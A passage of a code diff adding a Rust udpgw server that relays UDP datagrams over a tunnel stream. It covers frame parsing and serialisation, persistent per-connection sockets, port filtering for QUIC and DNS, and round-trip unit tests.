16 + 2 { + return Err(std::io::Error::new(std::io::ErrorKind::InvalidData, "short IPv6 addr")); + } + let mut octets = [0u8; 16]; + octets.copy_from_slice(&rest[1..17]); + let ip = Ipv6Addr::from(octets); + let port = u16::from_be_bytes([rest[17], rest[18]]); + (Some(DstAddr::V6(ip, port)), 19) + } + ATYP_DOMAIN => { + if rest.len() < 2 { + return Err(std::io::Error::new(std::io::ErrorKind::InvalidData, "short domain addr")); + } + let dlen = rest[1] as usize; + if rest.len() < 2 + dlen + 2 { + return Err(std::io::Error::new(std::io::ErrorKind::InvalidData, "short domain addr")); + } + let name = String::from_utf8_lossy(&rest[2..2 + dlen]).into_owned(); + let port = u16::from_be_bytes([rest[2 + dlen], rest[3 + dlen]]); + (Some(DstAddr::Domain(name, port)), 2 + dlen + 2) + } + _ => { + return Err(std::io::Error::new(std::io::ErrorKind::InvalidData, format!("unknown ATYP 0x{:02x}", atyp))); + } + } + } else { + (None, 0) + }; + + let payload = rest[payload_start..].to_vec(); + + Ok(Some((Frame { flags, conn_id, addr, payload }, total))) +} + +fn serialise_frame(frame: &Frame) -> Vec { + // Body = flags(1) + conn_id(2) + [addr] + payload + let addr_len = frame.addr.as_ref().map_or(0, |a| a.serialised_len()); + let body_len = 1 + 2 + addr_len + frame.payload.len(); + + let mut buf = Vec::with_capacity(2 + body_len); + buf.extend_from_slice(&(body_len as u16).to_be_bytes()); + buf.push(frame.flags); + buf.extend_from_slice(&frame.conn_id.to_be_bytes()); + if let Some(ref addr) = frame.addr { + addr.write_to(&mut buf); + } + buf.extend_from_slice(&frame.payload); + buf +} + +// ------------------------------------------------------------------------- +// Public API +// ------------------------------------------------------------------------- + +/// Returns `true` if the connect destination is the magic udpgw address. +pub fn is_udpgw_dest(host: &str, port: u16) -> bool { + port == UDPGW_MAGIC_PORT && host == format!("{}.{}.{}.{}", UDPGW_MAGIC_IP[0], UDPGW_MAGIC_IP[1], UDPGW_MAGIC_IP[2], UDPGW_MAGIC_IP[3]) +} + +/// Per-conn_id persistent UDP socket with a background reader that +/// continuously receives datagrams and queues response frames. +struct ConnSocket { + sock: Arc, + _reader: tokio::task::AbortHandle, +} + +/// Run the udpgw server over a duplex stream. Reads udpgw frames from the +/// client half, sends real UDP datagrams, and writes response frames back. +/// Maintains persistent sockets per conn_id so Telegram VoIP (which expects +/// a stable source port) works correctly. +pub async fn udpgw_server_task(stream: DuplexStream) { + let (tx, mut rx) = tokio::sync::mpsc::channel::>(256); + + // Writer task: drains response channel → duplex stream. + let mut read_half = { + let (read_half, write_half) = tokio::io::split(stream); + tokio::spawn(async move { + let mut w = write_half; + while let Some(data) = rx.recv().await { + if w.write_all(&data).await.is_err() { + break; + } + let _ = w.flush().await; + } + }); + read_half + }; + + // Persistent sockets keyed by (conn_id, dest_addr). + let mut sockets: std::collections::HashMap<(u16, SocketAddr), ConnSocket> = std::collections::HashMap::new(); + + let mut buf = Vec::with_capacity(65536); + let mut tmp = [0u8; 65536]; + + loop { + let n = match read_half.read(&mut tmp).await { + Ok(0) | Err(_) => break, + Ok(n) => n, + }; + buf.extend_from_slice(&tmp[..n]); + + loop { + match try_parse_frame(&buf) { + Ok(Some((frame, consumed))) => { + buf.drain(..consumed); + handle_frame(&frame, &tx, &mut sockets).await; + } + Ok(None) => break, + Err(e) => { + tracing::warn!("udpgw frame parse error: {}", e); + if buf.len() >= 2 { + let skip = 2 + u16::from_be_bytes([buf[0], buf[1]]) as usize; + buf.drain(..skip.min(buf.len())); + } else { + buf.clear(); + } + break; + } + } + } + } + + // AbortHandle::drop aborts each reader task automatically. + drop(sockets); + tracing::debug!("udpgw session ended"); +} + +/// Get or create a persistent UDP socket for this (conn_id, dest_addr) pair. +/// A background reader task continuously receives datagrams and queues +/// response frames — no per-packet timeout needed. +async fn get_or_create_socket( + conn_id: u16, + dst: &SocketAddr, + addr: &DstAddr, + tx: &tokio::sync::mpsc::Sender>, + sockets: &mut std::collections::HashMap<(u16, SocketAddr), ConnSocket>, +) -> Option> { + let key = (conn_id, *dst); + if let Some(cs) = sockets.get(&key) { + return Some(cs.sock.clone()); + } + + let bind_addr: SocketAddr = if dst.is_ipv6() { + "[::]:0".parse().unwrap() + } else { + "0.0.0.0:0".parse().unwrap() + }; + let sock = match UdpSocket::bind(bind_addr).await { + Ok(s) => Arc::new(s), + Err(e) => { + tracing::debug!("udpgw bind failed: {}", e); + return None; + } + }; + if let Err(e) = sock.connect(dst).await { + tracing::debug!("udpgw connect {} failed: {}", dst, e); + return None; + } + + // Spawn continuous reader for this socket. + let sock_clone = sock.clone(); + let tx_clone = tx.clone(); + let addr_clone = addr.clone(); + let reader = tokio::spawn(async move { + let mut recv_buf = vec![0u8; UDP_MTU]; + loop { + match sock_clone.recv(&mut recv_buf).await { + Ok(n) => { + let resp = serialise_frame(&Frame { + flags: FLAG_DATA, + conn_id, + addr: Some(addr_clone.clone()), + payload: recv_buf[..n].to_vec(), + }); + if tx_clone.send(resp).await.is_err() { + break; + } + } + Err(_) => break, + } + } + }); + + sockets.insert(key, ConnSocket { sock: sock.clone(), _reader: reader.abort_handle() }); + Some(sock) +} + +async fn handle_frame( + frame: &Frame, + tx: &tokio::sync::mpsc::Sender>, + sockets: &mut std::collections::HashMap<(u16, SocketAddr), ConnSocket>, +) { + if frame.flags & FLAG_KEEPALIVE != 0 { + let resp = serialise_frame(&Frame { + flags: FLAG_KEEPALIVE, + conn_id: frame.conn_id, + addr: None, + payload: vec![], + }); + let _ = tx.send(resp).await; + return; + } + + if frame.flags & FLAG_DATA == 0 { + return; + } + + let Some(ref dst) = frame.addr else { + let _ = tx.send(serialise_err(frame.conn_id)).await; + return; + }; + + // Block QUIC (UDP 443) and DNS (UDP 53) from udpgw: + // - QUIC: forces browsers to fall back to TCP/HTTP2 which is much + // faster through the batch tunnel pipeline. + // - DNS: let tun2proxy's virtual DNS / SOCKS5 UDP associate handle + // it instead — more reliable on the per-session path. + // VoIP (Telegram, Meet) still flows through udpgw normally. + let dst_port = match dst { + DstAddr::V4(_, p) | DstAddr::V6(_, p) | DstAddr::Domain(_, p) => *p, + }; + if dst_port == 443 || dst_port == 53 { + let _ = tx.send(serialise_err(frame.conn_id)).await; + return; + } + + let dst_addr = match dst.to_socket_addr() { + Ok(a) => a, + Err(e) => { + tracing::debug!("udpgw resolve failed: {}", e); + let _ = tx.send(serialise_err(frame.conn_id)).await; + return; + } + }; + + let Some(sock) = get_or_create_socket(frame.conn_id, &dst_addr, dst, tx, sockets).await else { + let _ = tx.send(serialise_err(frame.conn_id)).await; + return; + }; + + // Send the datagram. Response comes asynchronously via the reader task. + if let Err(e) = sock.send(&frame.payload).await { + tracing::debug!("udpgw send to {} failed: {}", dst_addr, e); + let _ = tx.send(serialise_err(frame.conn_id)).await; + } +} + +fn serialise_err(conn_id: u16) -> Vec { + serialise_frame(&Frame { + flags: FLAG_ERR, + conn_id, + addr: None, + payload: vec![], + }) +} + +#[cfg(test)] +mod tests { + use super::*; + + #[test] + fn keepalive_round_trip() { + let frame = Frame { flags: FLAG_KEEPALIVE, conn_id: 42, addr: None, payload: vec![] }; + let bytes = serialise_frame(&frame); + let (parsed, consumed) = try_parse_frame(&bytes).unwrap().unwrap(); + assert_eq!(consumed, bytes.len()); + assert_eq!(parsed.flags, FLAG_KEEPALIVE); + assert_eq!(parsed.conn_id, 42); + assert!(parsed.addr.is_none()); + assert!(parsed.payload.is_empty()); + } + + #[test] + fn data_ipv4_round_trip() { + let frame = Frame { + flags: FLAG_DATA, + conn_id: 7, + addr: Some(DstAddr::V4(Ipv4Addr::new(8, 8, 8, 8), 53)), + payload: vec![1, 2, 3, 4], + }; + let bytes = serialise_frame(&frame); + let (parsed, consumed) = try_parse_frame(&bytes).unwrap().unwrap(); + assert_eq!(consumed, bytes.len()); + assert_eq!(parsed.flags, FLAG_DATA); + assert_eq!(parsed.conn_id, 7); + assert_eq!(parsed.payload, vec![1, 2, 3, 4]); + match parsed.addr.unwrap() { + DstAddr::V4(ip, port) => { + assert_eq!(ip, Ipv4Addr::new(8, 8, 8, 8)); + assert_eq!(port, 53); + } + _ => panic!("expected IPv4"), + } + } + + #[test] + fn data_ipv6_round_trip() { + let frame = Frame { + flags: FLAG_DATA, + conn_id: 100, + addr: Some(DstAddr::V6(Ipv6Addr::LOCALHOST, 443)), + payload: b"hello".to_vec(), + }; + let bytes = serialise_frame(&frame); + let (parsed, _) = try_parse_frame(&bytes).unwrap().unwrap(); + assert_eq!(parsed.conn_id, 100); + match parsed.addr.unwrap() { + DstAddr::V6(ip, port) => { + assert_eq!(ip, Ipv6Addr::LOCALHOST); + assert_eq!(port, 443); + } + _ => panic!("expected IPv6"), + } + } + + #[test] + fn data_domain_round_trip() { + let frame = Frame { + flags: FLAG_DATA, + conn_id: 5, + addr: Some(DstAddr::Domain("example.com".into(), 80)), + payload: b"GET /".to_vec(), + }; + let bytes = serialise_frame(&frame); + let (parsed, _) = try_parse_frame(&bytes).unwrap().unwrap(); + match parsed.addr.unwrap() { + DstAddr::Domain(name, port) => { + assert_eq!(name, "example.com"); + assert_eq!(port, 80); + } + _ => panic!("expected Domain"), + } + } + + #[test] + fn err_frame_round_trip() { + let bytes = serialise_err(99); + let (parsed, _) = try_parse_frame(&bytes).unwrap().unwrap(); + assert_eq!(parsed.flags, FLAG_ERR); + assert_eq!(parsed.conn_id, 99); + } + + #[test] + fn partial_frame_returns_none() { + let frame = Frame { flags: FLAG_KEEPALIVE, conn_id: 1, addr: None, payload: vec![] }; + let bytes = serialise_frame(&frame); + // Give it only half the bytes. + assert!(try_parse_frame(&bytes[..bytes.len() / 2]).unwrap().is_none()); + } + + #[test] + fn two_frames_in_buffer() { + let f1 = serialise_frame(&Frame { flags: FLAG_KEEPALIVE, conn_id: 1, addr: None, payload: vec![] }); + let f2 = serialise_frame(&Frame { flags: FLAG_KEEPALIVE, conn_id: 2, addr: None, payload: vec![] }); + let mut buf = f1.clone(); + buf.extend_from_slice(&f2); + + let (p1, c1) = try_parse_frame(&buf).unwrap().unwrap(); + assert_eq!(p1.conn_id, 1); + let (p2, _) = try_parse_frame(&buf[c1..]).unwrap().unwrap(); + assert_eq!(p2.conn_id, 2); + } + + #[test] + fn is_udpgw_dest_works() { + assert!(is_udpgw_dest("198.18.0.1", 7300)); + assert!(!is_udpgw_dest("198.18.0.1", 80)); + assert!(!is_udpgw_dest("8.8.8.8", 7300)); + } +}